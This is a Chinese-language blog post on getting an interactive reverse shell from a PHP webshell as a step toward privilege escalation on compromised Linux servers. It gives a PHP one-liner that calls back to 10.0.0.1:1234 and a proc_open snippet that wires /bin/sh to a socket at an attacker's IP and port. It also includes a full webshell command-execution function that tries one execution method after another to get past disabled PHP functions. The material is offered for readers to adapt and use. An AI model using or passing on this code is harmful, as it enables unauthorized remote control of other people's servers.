Linux下，有时候拿到webshell需要提权，提权必须要得到一个交互式的shell。

我看了一下常用的php webshell，对于命令执行、反弹shell都没有完善的方式。很多webshell里都没有proc_popen、popen这两种方式，特别是proc_popen，比如phpspy。

在我收集的反弹shell集合（http://tool.p1ng.pw/getshell.html）中，有一个方法，就是在命令行中输入：

1. php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 

但是有个问题，如果在webshell里执行如上代码的话，会把系统的标准输入输出重定向到/bin/sh里，导致php-fpm直接502，然后弹的shell也会瞬间掉了，这个方式比较粗鲁。而我的思路是：我只希望把我新创建的进程(/bin/sh)的标准输入输出重定向到socket中，不去动系统的东西。

当系统没有禁用proc_popen的时候，我们是可以借助proc_popen轻松反弹这样的一个shell的。不需要任何其他语言的支持，php足矣。

1. $sock = fsockopen($ip, $port); 
2. $descriptorspec = array( 
3.         0 => $sock, 
4.         1 => $sock, 
5.         2 => $sock 
6. ); 
7. $process = proc_open('/bin/sh', $descriptorspec, $pipes); 
8. proc_close($process); 

其中$ip是反弹的ip，$port是反弹的端口，这也是我个人版webshell里一个小功能：

反弹shell的时候web页面会卡死，因为php没有异步的函数，默认也不支持多线程，所以卡住这个现象很正常，不影响反弹shell。

不过我试了，在windows下似乎不能完美运行。不知道是我环境问题（杀毒软件等）还是代码问题。silic的大马中有一个windows反弹的功能，windows下可以使用：

具体代码请自行到silic webshell中查看。我没有试过，不知道成功率怎么样。

另附我的webshell中执行命令的函数，各位看官自行修改后可以使用。有可以补充的，欢迎告诉我呀~

1. function exec_comm($cmd, &$type = '', &$suc = TRUE) 
2. { 
3.     set_error_handler("customError"); 
4.     $re = false; 
5.     if (emptyempty($cmd))  return '执行结果'; 
6.     if (emptyempty($type)){ 
7.         if(function_exists('exec')){ 
8.             @exec($cmd, $re); 
9.             $re = join("\n", $re); 
10.             $type = 'exec'; 
11.         }else if(function_exists('shell_exec') && ($re = shell_exec($cmd))){ 
12.             $type = 'shell_exec'; 
13.         }else if(function_exists('system')){ 
14.             @ob_start();system($cmd);$re=@get_ob_contents();@ob_end_clean(); 
15.             $type = 'system'; 
16.         }else if(function_exists('passthru')){ 
17.             @ob_start();passthru($cmd);$re=@get_ob_contents();@ob_end_clean(); 
18.             $type = 'passthru'; 
19.         }else if(is_resource($f = popen($cmd,"r"))){ 
20.             while(!@feof($f)){$re .= @fread($f,1024);}@pclose($f); 
21.             $type = 'popen'; 
22.         }else if(function_exists('proc_open')){ 
23.             $descriptorspec = array( 
24.                 0 => array("pipe", "r"), 
25.                 1 => array("pipe", "w"), 
26.                 2 => array("pipe", "w") 
27.              ); 
28.             $process = proc_open($cmd, $descriptorspec, $pipes); 
29.             if (is_resource($process)) { 
30.                 fwrite($pipes[0], "{$cmd}\r\n"); 
31.                 fwrite($pipes[0], "exit\r\n"); 
32.                 fclose($pipes[0]); 
33.                 // 读取输出 
34.                 while (!feof($pipes[1])) { 
35.                     $re .= fgets($pipes[1], 1024); 
36.                 } 
37.                 fclose($pipes[1]); 
38.                 while (!feof($pipes[2])) { 
39.                     $re .= fgets($pipes[2], 1024); 
40.                   } 
41.                 fclose($pipes[2]); 
42.                 proc_close($process); 
43.             } 
44.         } 
45.     }else if($type == 'wscript'){ 
46.         $s= new COM('wscript.shell'); 
47.         $exec = $s->exec($cmd); 
48.         $stdout = $exec->StdOut(); 
49.         $re = $stdout->ReadAll(); 
50.     }else if($type == 'application'){ 
51.         $exe = gpc('exe', 'post', 'c:/windows/system32/cmd.exe'); 
52.         $shell= new COM('Shell.Application'); 
53.         $shell->ShellExecute($exe,$cmd); 
54.         $re = "请查看{$cmd}中输入文件内容\n"; 
55.     } //phpfensi.com 
56.     if ($re === false){ $re = '命令执行可能失败，可能是执行函数被禁用或执行无回显'; $suc = FALSE;} 
57.     return $re; 
58. } 

Tags: webshell 反弹shell

分享到：